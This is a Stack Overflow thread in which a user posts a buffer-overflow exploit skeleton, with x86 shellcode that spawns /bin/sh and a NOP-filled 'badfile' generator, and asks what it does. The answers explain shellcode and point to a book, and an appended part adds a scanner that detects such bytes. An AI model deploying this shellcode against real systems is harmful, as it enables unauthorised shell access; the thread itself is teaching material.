-6

I have this code:

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    char shellcode[]=
        "\x31\xc0"             /* xorl    %eax,%eax              */
        "\x50"                 /* pushl   %eax                   */
        "\x68""//sh"           /* pushl   $0x68732f2f            */
        "\x68""/bin"           /* pushl   $0x6e69622f            */
        "\x89\xe3"             /* movl    %esp,%ebx              */
        "\x50"                 /* pushl   %eax                   */
        "\x53"                 /* pushl   %ebx                   */
        "\x89\xe1"             /* movl    %esp,%ecx              */
        "\x99"                 /* cdql                           */
        "\xb0\x0b"             /* movb    $0x0b,%al              */
        "\xcd\x80"             /* int     $0x80                  */
    ;

    void main(int argc, char **argv)
    {
        char buffer[517];
        FILE *badfile;

        /* Initialize buffer with 0x90 (NOP instruction) */
        memset(&buffer, 0x90, 517);

        /* You need to fill the buffer with appropriate contents here */

        /* Save the contents to the file "badfile" */
        badfile = fopen("./badfile", "w");
        fwrite(buffer, 517, 1, badfile);
        fclose(badfile);
    }

I want to know and learn more about this kind of code that is called an exploit. What is that shellcode? How can I learn to code those shells? I want to know exactly what this code does.

Jules
  • You want the SO community to teach you about shellcode and exploits? Good luck with that. – Jules May 17 '14 at 17:13
  • They couldn't help me, just voting my post down :) – user3620354 May 17 '14 at 17:13
  • Start by replacing `void main` with `int main`. – chris May 17 '14 at 17:14
  • You need to learn assembly then. Stack Overflow's not going to provide you with a full assembly course. You need to find books/tutorials and use those. You can ask here when you have _specific_ questions. – Mat May 17 '14 at 17:14
  • @JulesMazur I didn't want any community :). Anyone can write this kind of code; he or she learned it somewhere and then created it, but I didn't know the shellcode phrase and codes. Is there any place to learn those statements? – user3620354 May 17 '14 at 17:15
  • As said, SO is not a forum to post on to learn from scratch. – Jongware May 17 '14 at 17:17
  • @Jongware But here is a place where people (programmers) meet each other and share their EXPERIENCES – user3620354 May 17 '14 at 17:28
  • No, it is not. It's a forum for concrete programming related questions. Read [About SO](http://stackoverflow.com/about), as your profile suggests you have not done so yet. – Jongware May 17 '14 at 17:32

2 Answers

2

Probably too broad a question, but I'll provide some info for a novice anyway:

A shellcode is usually a series of instructions in a target-specific language that are "written" to memory and intended to be executed to gain privileges or manipulate data.

Shellcodes are extremely hardware, platform and version specific: if you have an x86 processor you'll have to target that ISA in order to get your code running once you have "injected" it or diverted the main program's execution to it.

Machine instructions are usually binary code (or hex, depending on how you represent the data), and to tell the machine what it should do next, you use an opcode. In the code above, you're looking exactly at opcodes, which specify:

  • The instruction to be executed
  • The operands on which it should be executed

That said: there's a lot you would need to learn about programming, reversing, architectures, system internals and security systems if you really want to tackle the security field.

As for what that code does: it enters a syscall and executes /bin/sh

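    #include <unistd.h>

    int main(void)
    {
        char *shell[2];

        /* argv for the new program: { "/bin/sh", NULL } */
        shell[0] = "/bin/sh";
        shell[1] = NULL;

        /* Replace this process image with /bin/sh */
        execve(shell[0], shell, NULL);

        return 1;   /* only reached if execve() fails */
    }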

Taken from http://www.enderunix.org/docs/en/bof-eng.txt

Good luck.

Marco A.
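
As an added illustration (not part of the answers on this page), the C sketch below treats the bytes quoted in the question purely as data and shows how a defender might flag them in a file such as `badfile`: it measures the longest run of 0x90 NOP bytes and looks for the `int $0x80` opcode and the two `push` immediates that spell `/bin//sh`. The names `sample`, `scan_result`, `contains` and `scan_buffer` are hypothetical, and the sample buffer is constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: a short NOP run followed by the bytes quoted in the
 * question. It is only scanned as data here and is never executed. */
static const unsigned char sample[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xc0" "\x50" "\x68" "//sh" "\x68" "/bin" "\x89\xe3"
    "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80";
#define SAMPLE_LEN (sizeof sample - 1)   /* drop the literal's trailing NUL */

struct scan_result {
    size_t longest_nop_run;  /* longest run of 0x90 bytes */
    int has_int80;           /* CD 80: the int $0x80 syscall gate */
    int has_binsh_push;      /* both push immediates spelling /bin//sh */
};

/* Byte-wise substring search (memmem is not standard C). */
static int contains(const unsigned char *buf, size_t len,
                    const char *pat, size_t plen)
{
    for (size_t i = 0; plen <= len && i <= len - plen; i++)
        if (memcmp(buf + i, pat, plen) == 0)
            return 1;
    return 0;
}

struct scan_result scan_buffer(const unsigned char *buf, size_t len)
{
    struct scan_result r = {0, 0, 0};
    size_t run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run > r.longest_nop_run)
            r.longest_nop_run = run;
    }
    r.has_int80 = contains(buf, len, "\xcd\x80", 2);
    r.has_binsh_push = contains(buf, len, "\x68" "//sh", 5) &&
                       contains(buf, len, "\x68" "/bin", 5);
    return r;
}

int main(void)
{
    struct scan_result r = scan_buffer(sample, SAMPLE_LEN);
    printf("nop run=%zu int80=%d binsh=%d\n",
           r.longest_nop_run, r.has_int80, r.has_binsh_push);
    return 0;
}
```

Byte signatures like these are a heuristic: encoded or reordered payloads will not match, so they complement mitigations such as non-executable stacks and do not replace them.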
1

Page 315 of Hacking: The Art of Exploitation does a good job explaining what that code does.

Tom van der Woerdt